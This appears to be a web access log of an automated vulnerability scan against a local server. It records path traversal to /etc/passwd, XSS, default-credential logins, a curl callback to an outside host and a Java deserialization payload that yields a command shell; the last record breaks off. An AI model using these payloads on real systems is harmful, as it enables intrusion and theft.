+{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"customerID=1&isEncoded=false&userName=diagnostics&password=YWRtaW4=&ldapServerName=UCMDB","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ucmdb-ui/cms/loginRequest.do; HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /storage/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/wp-file-manager-pro/fm_backup/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%2f%2f.example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"action=login&username=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /monitorix-cgi/monitorix.cgi?mode=localhost&graph=all&when=1day HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_users/_all_docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php.dist HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/Attitude/go.php?https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json;%0aa.png?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?action=dzsap_download&link=../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dana-na/auth/url_3/welcome.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /includes/dompdf/dompdf.php?input_file=dompdf.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /css../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /errors_log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"csrfmiddlewaretoken={{csrfmiddlewaretoken}}&username=cloudera&password=cloudera&next=%2F","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /hue/accounts/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"username=admin&password=admin?show+webmaster+user","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /404 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api_smartapp/storage/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=../../../../../index.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/login?LD_DEBUG=files HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%3F.example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Dockerrun.aws.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /module/api.php?mobile/webNasIPS HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"TNAS", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php.old HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fuel/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"cmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth=nuclei&formDate=1597704739243&tableId=1&name=A&type=1&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00037870767200206A617661782E7363726970742E536372697074456E67696E654D616E61676572000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000074000B6E6577496E7374616E6365757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007371007E00137571007E00180000000174000A4A61766153637269707474000F676574456E67696E6542794E616D657571007E001B00000001767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707371007E0013757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017404567661722063757272656E74546872656164203D20636F6D2E6C6966657261792E706F7274616C2E736572766963652E53657276696365436F6E746578745468726561644C6F63616C2E67657453657276696365436F6E7465787428293B0A76617220697357696E203D206A6176612E6C616E672E53797374656D2E67657450726F706572747928226F732E6E616D6522292E746F4C6F7765724361736528292E636F6E7461696E73282277696E22293B0A7661722072657175657374203D2063757272656E745468726561642E6765745265717565737428293B0A766172205F726571203D206F72672E6170616368652E636174616C696E612E636F6E6E6563746F722E526571756573744661636164652E636C6173732E6765744465636C617265644669656C6428227265717565737422293B0A5F7265712E73657441636365737369626C652874727565293B0A766172207265616C52657175657374203D205F7265712E6765742872657175657374293B0A76617220726573706F6E7365203D207265616C526571756573742E676574526573706F6E736528293B0A766172206F757470757453747265616D203D20726573706F6E73652E6765744F757470757453747265616D28293B0A76617220636D64203D206E6577206A6176612E6C616E672E537472696E6728726571756573742E6765744865616465722822636D64322229293B0A766172206C697374436D64203D206E6577206A6176612E7574696C2E41727261794C69737428293B0A7661722070203D206E6577206A6176612E6C616E672E50726F636573734275696C64657228293B0A696628697357696E297B0A20202020702E636F6D6D616E642822636D642E657865222C20222F63222C20636D64293B0A7D656C73657B0A20202020702E636F6D6D616E64282262617368222C20222D63222C20636D64293B0A7D0A702E72656469726563744572726F7253747265616D2874727565293B0A7661722070726F63657373203D20702E737461727428293B0A76617220696E70757453747265616D526561646572203D206E6577206A6176612E696F2E496E70757453747265616D5265616465722870726F636573732E676574496E70757453747265616D2829293B0A766172206275666665726564526561646572203D206E6577206A6176612E696F2E427566666572656452656164657228696E70757453747265616D526561646572293B0A766172206C696E65203D2022223B0A7661722066756C6C54657874203D2022223B0A7768696C6528286C696E65203D2062756666657265645265616465722E726561644C696E6528292920213D206E756C6C297B0A2020202066756C6C54657874203D2066756C6C54657874202B206C696E65202B20225C6E223B0A7D0A766172206279746573203D2066756C6C546578742E676574427974657328225554462D3822293B0A6F757470757453747265616D2E7772697465286279746573293B0A6F757470757453747265616D2E636C6F736528293B0A7400046576616C7571007E001B0000000171007E00237371007E000F737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000077080000001000000000787878%3B%22%7D","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/jsonws/invoke HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"http://127.0.0.1/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json;%0aa.ico?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Sitefinity/Authenticate/SWT HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/maint/repair.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logs/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"document=this.constructor.constructor(\x22return process\x22)().mainModule.require(\x22child_process\x22).execSync(\x22curl http://ca2tuc8smpv1g2s80ca0fwqsgewicgcjt.oast.pro\x22)","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /checkValid HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"username=admin&password={{admin}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s/29N5EjWXKoObEfKJxvd3g5tHNqH/_/;/WEB-INF/web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x22&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX%3Cscript%3Ealert(31337)%3C%2Fscript%3E&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=OO HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /equipbid/storage/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/ajax.render.php?operation=render_dashboard&dashboard_id=1&layout_class=DashboardLayoutOneCol&title=%%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%5c%5c.example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /seeyon/personalBind.do.jpg/..;/ajax.do?method=ajaxAction&managerName=mMOneProfileManager&managerMethod=getOAProfile HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?29N5Eg18jWiXRmHunF6kUeJYxBL=9 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"for.cache.example.com"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php.save HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=contact-form-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"cmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth=nuclei&formDate=1597704739243&tableId=1&name=A&type=1&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616